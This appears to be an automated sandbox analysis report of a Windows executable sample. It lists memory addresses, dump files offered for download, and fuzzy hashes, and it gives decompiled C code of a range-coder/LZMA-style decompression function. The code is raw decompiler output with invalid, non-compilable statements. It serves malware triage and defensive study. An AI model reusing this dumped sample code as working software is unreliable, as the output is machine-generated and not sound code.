                                                                                                                                                                                                                            0x004073a8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407452
                                                                                                                                                                                                                            0x00407456
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x0040747b
                                                                                                                                                                                                                            0x00407482
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00407458
                                                                                                                                                                                                                            0x0040745b
                                                                                                                                                                                                                            0x0040745e
                                                                                                                                                                                                                            0x00407461
                                                                                                                                                                                                                            0x00407468
                                                                                                                                                                                                                            0x004073ac
                                                                                                                                                                                                                            0x004073ac
                                                                                                                                                                                                                            0x004073af
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407543
                                                                                                                                                                                                                            0x00407546
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040717d
                                                                                                                                                                                                                            0x0040717f
                                                                                                                                                                                                                            0x00407186
                                                                                                                                                                                                                            0x00407187
                                                                                                                                                                                                                            0x00407189
                                                                                                                                                                                                                            0x0040718c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407194
                                                                                                                                                                                                                            0x00407197
                                                                                                                                                                                                                            0x0040719a
                                                                                                                                                                                                                            0x0040719c
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719f
                                                                                                                                                                                                                            0x004071a2
                                                                                                                                                                                                                            0x004071a9
                                                                                                                                                                                                                            0x004071ac
                                                                                                                                                                                                                            0x004071ba
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407493
                                                                                                                                                                                                                            0x0040749a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x004074a3
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x004074a9
                                                                                                                                                                                                                            0x004074ac
                                                                                                                                                                                                                            0x004074af
                                                                                                                                                                                                                            0x004074b3
                                                                                                                                                                                                                            0x004074b6
                                                                                                                                                                                                                            0x004074bc
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074c1
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074cb
                                                                                                                                                                                                                            0x0040752b
                                                                                                                                                                                                                            0x0040752e
                                                                                                                                                                                                                            0x00407533
                                                                                                                                                                                                                            0x00407534
                                                                                                                                                                                                                            0x00407536
                                                                                                                                                                                                                            0x00407538
                                                                                                                                                                                                                            0x0040753b
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004074cd
                                                                                                                                                                                                                            0x004074d3
                                                                                                                                                                                                                            0x004074d6
                                                                                                                                                                                                                            0x004074d9
                                                                                                                                                                                                                            0x004074dc
                                                                                                                                                                                                                            0x004074df
                                                                                                                                                                                                                            0x004074e2
                                                                                                                                                                                                                            0x004074e5
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x0040751d
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x004072cb
                                                                                                                                                                                                                            0x004072ce
                                                                                                                                                                                                                            0x004072d1
                                                                                                                                                                                                                            0x004072d4
                                                                                                                                                                                                                            0x004072d7
                                                                                                                                                                                                                            0x004072f0
                                                                                                                                                                                                                            0x004072f2
                                                                                                                                                                                                                            0x004072f5
                                                                                                                                                                                                                            0x004072f6
                                                                                                                                                                                                                            0x004072f9
                                                                                                                                                                                                                            0x004072fb
                                                                                                                                                                                                                            0x004072fe
                                                                                                                                                                                                                            0x00407300
                                                                                                                                                                                                                            0x00407302
                                                                                                                                                                                                                            0x00407305
                                                                                                                                                                                                                            0x00407307
                                                                                                                                                                                                                            0x0040730a
                                                                                                                                                                                                                            0x0040730e
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407311
                                                                                                                                                                                                                            0x00407314
                                                                                                                                                                                                                            0x00407317
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072e1
                                                                                                                                                                                                                            0x004072e6
                                                                                                                                                                                                                            0x004072e8
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x0040731a
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x00407234
                                                                                                                                                                                                                            0x00407237
                                                                                                                                                                                                                            0x00407239
                                                                                                                                                                                                                            0x0040723c
                                                                                                                                                                                                                            0x0040723f
                                                                                                                                                                                                                            0x00407242
                                                                                                                                                                                                                            0x00407244
                                                                                                                                                                                                                            0x00407247
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x00407250
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x004071dd
                                                                                                                                                                                                                            0x004071e0
                                                                                                                                                                                                                            0x004071e2
                                                                                                                                                                                                                            0x004071e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f48
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00406f4e
                                                                                                                                                                                                                            0x00406f51
                                                                                                                                                                                                                            0x00406f54
                                                                                                                                                                                                                            0x00406f57
                                                                                                                                                                                                                            0x00406f5a
                                                                                                                                                                                                                            0x00406f5d
                                                                                                                                                                                                                            0x00406f60
                                                                                                                                                                                                                            0x00406f62
                                                                                                                                                                                                                            0x00406f65
                                                                                                                                                                                                                            0x00406f68
                                                                                                                                                                                                                            0x00406f6b
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070d3
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x004070d9
                                                                                                                                                                                                                            0x004070dc
                                                                                                                                                                                                                            0x004070df
                                                                                                                                                                                                                            0x004070e2
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e7
                                                                                                                                                                                                                            0x004070ea
                                                                                                                                                                                                                            0x004070ed
                                                                                                                                                                                                                            0x004070f0
                                                                                                                                                                                                                            0x004070f3
                                                                                                                                                                                                                            0x004070f6
                                                                                                                                                                                                                            0x004070f7
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070fc
                                                                                                                                                                                                                            0x004070ff
                                                                                                                                                                                                                            0x00407102
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407108
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x00407350
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407356
                                                                                                                                                                                                                            0x00407359
                                                                                                                                                                                                                            0x0040735c
                                                                                                                                                                                                                            0x0040735f
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407364
                                                                                                                                                                                                                            0x00407367
                                                                                                                                                                                                                            0x0040736a
                                                                                                                                                                                                                            0x0040736d
                                                                                                                                                                                                                            0x00407370
                                                                                                                                                                                                                            0x00407373
                                                                                                                                                                                                                            0x00407374
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x004075e5
                                                                                                                                                                                                                            0x004075eb
                                                                                                                                                                                                                            0x004075ed
                                                                                                                                                                                                                            0x004075f4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                                                                                                                                                            • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
